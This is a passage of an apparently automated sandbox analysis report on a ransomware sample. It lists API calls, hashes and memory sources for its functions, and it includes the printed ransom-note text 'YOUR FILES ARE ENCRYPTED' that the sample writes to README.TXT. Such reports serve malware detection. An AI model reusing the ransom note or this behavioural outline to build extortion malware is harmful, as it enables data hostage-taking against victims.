closesocket 1393->1396 1394->1371 1402 5c6412 1394->1402 1403 5c64ad-5c64b0 1395->1403 1404 5c64b2 1395->1404 1413 5c655d-5c6560 1396->1413 1414 5c6562 1396->1414 1397->1370 1405 5c6504-5c6506 1397->1405 1398->1388 1399->1371 1407 5c647a-5c647d CancelIo 1400->1407 1408 5c6483 1400->1408 1409 5c652d-5c6530 CancelIo 1401->1409 1410 5c6536-5c653b 1401->1410 1411 5c644b-5c6453 1402->1411 1412 5c64b7-5c64c6 GlobalFree 1403->1412 1404->1412 1405->1371 1407->1408 1408->1391 1409->1410 1410->1401 1416 5c653d 1410->1416 1418 5c6414-5c6430 shutdown closesocket 1411->1418 1419 5c6455 1411->1419 1412->1385 1417 5c6567-5c6570 GlobalFree 1413->1417 1414->1417 1416->1393 1417->1393 1420 5c6437 1418->1420 1421 5c6432-5c6435 1418->1421 1419->1373 1422 5c643c-5c6445 GlobalFree 1420->1422 1421->1422 1422->1411
                                  APIs
                                  • CreateTimerQueue.KERNEL32 ref: 005C634C
                                  • ExitThread.KERNEL32 ref: 005C635A
                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,000000FF), ref: 005C6374
                                  • setsockopt.WS2_32(?,0000FFFF,00007010,00000000,00000000), ref: 005C63AE
                                  • getsockopt.WS2_32(?,0000FFFF,0000700C,?,?), ref: 005C63D2
                                  • shutdown.WS2_32(?,00000001), ref: 005C6419
                                  • closesocket.WS2_32(?), ref: 005C6422
                                  • GlobalFree.KERNEL32(00000000), ref: 005C6445
                                  • CreateTimerQueueTimer.KERNEL32(00000000,00000000,005C6321,00000000,00007530,00000000,00000000), ref: 005C64F6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Timer$CreateQueue$CompletionExitFreeGlobalQueuedStatusThreadclosesocketgetsockoptsetsockoptshutdown
                                  • String ID:
                                  • API String ID: 2072280112-0
                                  • Opcode ID: 5c479a3c9ae3f3f202b82473b207404b7c472ccda40fc3f289b4a264eac73f9a
                                  • Instruction ID: 536041affdcaaf0a5f1c8121380b213be56c10ba80ffc11dea64573094e759be
                                  • Opcode Fuzzy Hash: 5c479a3c9ae3f3f202b82473b207404b7c472ccda40fc3f289b4a264eac73f9a
                                  • Instruction Fuzzy Hash: 1C618074A00600EFDB218FA0DD89F6A7BF9FF09B01F100A6DE94297690D731EA45DB61
                                  Function 005C6A84 Relevance: 16.6, APIs: 11, Instructions: 100threadnetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 005C5CE2: socket.WS2_32(00000002,00000001,00000000), ref: 005C5CEF
                                    • Part of subcall function 005C5CE2: WSAIoctl.WS2_32(00000000,C8000006,25A207B9,00000010,006D95E4,00000004,00000000,00000000,00000000), ref: 005C5D33
                                    • Part of subcall function 005C5CE2: closesocket.WS2_32(00000000), ref: 005C5D3E
                                  • gethostname.WS2_32(?,00000100), ref: 005C6ADD
                                  • gethostbyname.WS2_32(?), ref: 005C6AEF
                                  • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 005C6AFF
                                  • InitializeCriticalSection.KERNEL32(006D95B4), ref: 005C6B17
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000606C,00000000,00000000,00000000), ref: 005C6B61
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00006336,00000000,00000000,00000000), ref: 005C6B7B
                                  • PostQueuedCompletionStatus.KERNEL32(00000000,00000001,00000000), ref: 005C6B95
                                  • DeleteCriticalSection.KERNEL32(006D95B4,00000000,00000000), ref: 005C6BB4
                                  • CloseHandle.KERNEL32 ref: 005C6BC0
                                  • CloseHandle.KERNEL32(00000000,00000000,00000000), ref: 005C6BCC
                                  • CloseHandle.KERNEL32(00000000,00000000,00000000), ref: 005C6BD8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CloseCreateHandle$CompletionCriticalSectionThread$DeleteInitializeIoctlPortPostQueuedStatusclosesocketgethostbynamegethostnamesocket
                                  • String ID:
                                  • API String ID: 1063477411-0
                                  • Opcode ID: 83509e553377d2fce0ee67ff8d32bdf5bb563405e0aba276e62d9a42495c19c3
                                  • Instruction ID: 6ec1dd6a83c0354c3b477a03e237893638fb63710b3f0b42a670a58cce4987b6
                                  • Opcode Fuzzy Hash: 83509e553377d2fce0ee67ff8d32bdf5bb563405e0aba276e62d9a42495c19c3
                                  • Instruction Fuzzy Hash: 613108B4D05205AFDB21AFA4BC88F667BAEF70575CF10263BA521D22A0D7718D81CB70
                                  Function 005D1B5F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58stringwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlenW.KERNEL32(00000000,?,00000001,00000000,?,?,?,005C6A27,?,00000000,006D95B4), ref: 005D1B85
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • lstrlenW.KERNEL32(?,?,005C6A27,?,00000000,006D95B4), ref: 005D1B96
                                  • lstrcpyW.KERNEL32(00000000,'j\,?,005C6A27,?,00000000,006D95B4), ref: 005D1BB8
                                  • lstrcpyW.KERNEL32(00000000,?,?,005C6A27,?,00000000,006D95B4), ref: 005D1BBE
                                  • EnterCriticalSection.KERNEL32(006DA3EC,?,005C6A27,?,00000000,006D95B4), ref: 005D1BC5
                                  • PostMessageW.USER32(0000069A,00000000,00000000), ref: 005D1BD8
                                  • LeaveCriticalSection.KERNEL32(006DA3EC,?,005C6A27,?,00000000,006D95B4), ref: 005D1BE5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CriticalSectionlstrcpylstrlen$AllocateEnterHeapLeaveMessagePost
                                  • String ID: 'j\
                                  • API String ID: 393566716-1066145669
                                  • Opcode ID: 2302989413c96aa2e2f56ca3b0374ac17f983dda04af4c0506c38846ba3ba31f
                                  • Instruction ID: 32a39f0c13d7159bd501d2a5f45155c88fa36c0125404b1900b89713d431f147
                                  • Opcode Fuzzy Hash: 2302989413c96aa2e2f56ca3b0374ac17f983dda04af4c0506c38846ba3ba31f
                                  • Instruction Fuzzy Hash: 5C01A1729006147BDB216BE8AC4DE6E7EAEEBC5750F05011FF90197220EA759D418B94
                                  Function 005D1C06 Relevance: 10.6, APIs: 7, Instructions: 59stringwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlenW.KERNEL32(?,00000001,00000000,00000000,?,005C87CC,0000001B,0000001F), ref: 005D1C22
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • lstrlenW.KERNEL32(?,?,005C87CC,0000001B,0000001F), ref: 005D1C35
                                  • wvsprintfW.USER32(00000000,?,0000001F), ref: 005D1C55
                                  • lstrcpyW.KERNEL32(00000000,?,?,005C87CC,0000001B,0000001F), ref: 005D1C63
                                  • EnterCriticalSection.KERNEL32(006DA3EC,?,005C87CC,0000001B,0000001F), ref: 005D1C6E
                                  • PostMessageW.USER32(0000069C,00000000,00000000), ref: 005D1C81
                                  • LeaveCriticalSection.KERNEL32(006DA3EC,?,005C87CC,0000001B,0000001F), ref: 005D1C8E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CriticalSectionlstrlen$AllocateEnterHeapLeaveMessagePostlstrcpywvsprintf
                                  • String ID:
                                  • API String ID: 3891508472-0
                                  • Opcode ID: 747e7fac786e6306b581fde0b4151e453662580b1ac9220361dcc1427a25b7e0
                                  • Instruction ID: 7d6189cf5c693287817b789a38bc40beb1c1bb6eeab4223d2304a3269b281823
                                  • Opcode Fuzzy Hash: 747e7fac786e6306b581fde0b4151e453662580b1ac9220361dcc1427a25b7e0
                                  • Instruction Fuzzy Hash: F5118236650A14BBCB215FE8AD4CA7A3F6EFBC5751F00112BFA06C6230DA719D11C794
                                  Function 005C606C Relevance: 7.5, APIs: 5, Instructions: 36sleepthreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • EnterCriticalSection.KERNEL32(006D95B4), ref: 005C6074
                                  • LeaveCriticalSection.KERNEL32(006D95B4), ref: 005C6085
                                  • Sleep.KERNEL32(000003E8), ref: 005C6090
                                  • LeaveCriticalSection.KERNEL32(006D95B4), ref: 005C60B5
                                  • ExitThread.KERNEL32 ref: 005C60DA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Leave$EnterExitSleepThread
                                  • String ID:
                                  • API String ID: 1955914877-0
                                  • Opcode ID: 33368c9befba6082debdf2fb9938becf51508539a7b80045ce03f85ab2453694
                                  • Instruction ID: e36b7af6421a119a305e5a598c3f7b52fb815be78e93776faea144057afadb64
                                  • Opcode Fuzzy Hash: 33368c9befba6082debdf2fb9938becf51508539a7b80045ce03f85ab2453694
                                  • Instruction Fuzzy Hash: 43018134602701DFC7659FA0DE8CF1A7BBABB457057502A1CE647ABB91CB31AD418B50
                                  Function 005C9FA1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,08000000,00000000,00000000,00000000,006D9A1C,00000000,?,005C8208,README.TXT), ref: 005C9FBF
                                  • WriteFile.KERNEL32(00000000,YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.Only we can give you this ke,?,?,00000000,?,005C8208,README.TXT), ref: 005C9FD8
                                  • CloseHandle.KERNEL32(00000000,?,005C8208,README.TXT), ref: 005C9FDF
                                  Strings
                                  • YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.Only we can give you this ke, xrefs: 005C9FD6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: File$CloseCreateHandleWrite
                                  • String ID: YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.Only we can give you this ke
                                  • API String ID: 1065093856-2326073150
                                  • Opcode ID: b49c44c767d771e51e42755713527a436eb4072cd9f60b10d45c601be4b279a0
                                  • Instruction ID: d1cf7103d503e660a2d4bd2157224e4a384e614d819cc23be858df4ac36548e0
                                  • Opcode Fuzzy Hash: b49c44c767d771e51e42755713527a436eb4072cd9f60b10d45c601be4b279a0
                                  • Instruction Fuzzy Hash: CEF0A0B2610214BFE7109BA9AC4DFEF3AACDB8A771F104224F901E7190E2709E4186B0
                                  Function 005CB415 Relevance: 6.1, APIs: 4, Instructions: 57sleepserviceCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,00000000,?,?,?,?,?,?,?,?,?,?,005CB73D), ref: 005CB429
                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,005CB73D), ref: 005CB456
                                  • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,005CB73D,?,?,?,?,?,?,?,?,?,005CB73D), ref: 005CB469
                                  • GetTickCount.KERNEL32 ref: 005CB478
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Service$ControlCountQuerySleepStatusTick
                                  • String ID:
                                  • API String ID: 377103355-0
                                  • Opcode ID: 9c13b17a1764dc9db99a428214e50b9924854f4d623a093e174d6b5af71daff4
                                  • Instruction ID: 6b1a32b92c2ec9ee7fda745cc7044f0ccc3bca48599c707c667cd6219bb52cf6
                                  • Opcode Fuzzy Hash: 9c13b17a1764dc9db99a428214e50b9924854f4d623a093e174d6b5af71daff4
                                  • Instruction Fuzzy Hash: A501C431A08108AFEB28CAE49CC9FAE3BEEFB45745F10053EE205D2180DB60CD418665
                                  Function 005C9FF2 Relevance: 4.5, APIs: 3, Instructions: 43fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 005C9F53: FindFirstFileW.KERNEL32(?,?), ref: 005C9F64
                                    • Part of subcall function 005C9F53: FindClose.KERNEL32(00000000), ref: 005C9F70
                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,08000000,00000000,006D9048,00000000,00000000,00000000,00000000,?,005C17DC,00000240), ref: 005CA01C
                                  • ReadFile.KERNEL32(00000000,006D9048,?,?,00000000,?,005C17DC,00000240), ref: 005CA035
                                  • CloseHandle.KERNEL32(00000000,?,005C17DC,00000240), ref: 005CA03C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: File$CloseFind$CreateFirstHandleRead
                                  • String ID:
                                  • API String ID: 389924854-0
                                  • Opcode ID: ea8140cdfda668e631c44584473328d6b63326e4a3f090fff561634648facc64
                                  • Instruction ID: c999b2c4c2dfaa4e171ccb0ce9743b482f8daf68ba03942078b551e5d720ebb4
                                  • Opcode Fuzzy Hash: ea8140cdfda668e631c44584473328d6b63326e4a3f090fff561634648facc64
                                  • Instruction Fuzzy Hash: 6AF0B471610218BFE71067B99C4DFBB7AACEF493A1F144229B900E7190E6B09E4186B0
                                  Function 005D1A97 Relevance: 4.5, APIs: 3, Instructions: 40COMMON
                                  Download Yara Rule
                                  APIs
                                  • EnterCriticalSection.KERNEL32(006DA3EC,?,00000000,?,005C67AA), ref: 005D1B01
                                  • KiUserCallbackDispatcher.NTDLL(00010456,00000001), ref: 005D1B09
                                  • LeaveCriticalSection.KERNEL32(006DA3EC,?,00000000,?,005C67AA), ref: 005D1B10
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CriticalSection$CallbackDispatcherEnterLeaveUser
                                  • String ID:
                                  • API String ID: 351745511-0
                                  • Opcode ID: 650e1b775361762393f208989e2c3fd309af7485a1aa53f71b6f7be10fbacb27
                                  • Instruction ID: 4b1da30d76ba9ad6100afabc37591b80c25fbe5f4dfba9b063f1b738ac935d56
                                  • Opcode Fuzzy Hash: 650e1b775361762393f208989e2c3fd309af7485a1aa53f71b6f7be10fbacb27
                                  • Instruction Fuzzy Hash: 0A011232D0F950FFCB244B8CAE885167B7AF74531171A2553E9057B322D3B42C419BD9
                                  Function 005C5CE2 Relevance: 4.5, APIs: 3, Instructions: 39networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • socket.WS2_32(00000002,00000001,00000000), ref: 005C5CEF
                                  • WSAIoctl.WS2_32(00000000,C8000006,25A207B9,00000010,006D95E4,00000004,00000000,00000000,00000000), ref: 005C5D33
                                  • closesocket.WS2_32(00000000), ref: 005C5D3E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Ioctlclosesocketsocket
                                  • String ID:
                                  • API String ID: 1684324062-0
                                  • Opcode ID: 24c5905bf8126ecec6575c9c41d8f5e93c8199ad57fb2c92fc14e0acaac15310
                                  • Instruction ID: 34f7bf53a60222ad271a97bea3a9940459d04004e6d27ff0df110317adf489af
                                  • Opcode Fuzzy Hash: 24c5905bf8126ecec6575c9c41d8f5e93c8199ad57fb2c92fc14e0acaac15310
                                  • Instruction Fuzzy Hash: D4F06270A40715BEEB209FE58C4EFAE7ABDEB10754F104658F912FE1C0E3B05A414AB2
                                  Function 005C9F0E Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • TranslateMessage.USER32(?), ref: 005C9F2D
                                  • DispatchMessageW.USER32(?), ref: 005C9F37
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005C9F46
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Message$DispatchPeekTranslate
                                  • String ID:
                                  • API String ID: 4217535847-0
                                  • Opcode ID: 643740aaeff61d64b3e091fc6d63976458593e0a105c7a80344050429f82095a
                                  • Instruction ID: f705f255fd285315b73e5676ea3bdf7818ca0fe631797dd31370c8a5fc70fad3
                                  • Opcode Fuzzy Hash: 643740aaeff61d64b3e091fc6d63976458593e0a105c7a80344050429f82095a
                                  • Instruction Fuzzy Hash: 1AF03076D10249ABDF205BE5DC0DEAB7BBDAB81B00F005529A512D6450E6B89546C760
                                  Function 005C629A Relevance: 3.1, APIs: 2, Instructions: 52networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • htons.WS2_32(000001BD), ref: 005C62C8
                                  • WSAGetLastError.WS2_32(?,?,005C64E2), ref: 005C62FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ErrorLasthtons
                                  • String ID:
                                  • API String ID: 1658467590-0
                                  • Opcode ID: 057f337f1e50bc9a9a4f144a27a91aa00ffdf403ab15f4e7e7736e60c0f14c9d
                                  • Instruction ID: 2ce5d5d0664e661db25b9310994bd926e24902f4045e7f36aa802bd35d451342
                                  • Opcode Fuzzy Hash: 057f337f1e50bc9a9a4f144a27a91aa00ffdf403ab15f4e7e7736e60c0f14c9d
                                  • Instruction Fuzzy Hash: D3010435901358AFDB218FE49941FAB7BBCFF15B04F00061EE842A7291D360EE448BB1
                                  Function 006781A7 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 006781C8
                                    • Part of subcall function 0067718E: RtlAllocateHeap.NTDLL(00000000,?,00000000,006815F0,005DBB23,00000188,?,00000000,005D6E99,00000188,..\..\openssl-1.1.0f\crypto\err\err.c,0000028F,006D9048), ref: 006771C0
                                  • RtlReAllocateHeap.NTDLL(00000000,?,?,00000004,00000000,?,006779DC,?,00000004,00000000,?,?,?,0066958B,?,00000000), ref: 00678204
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
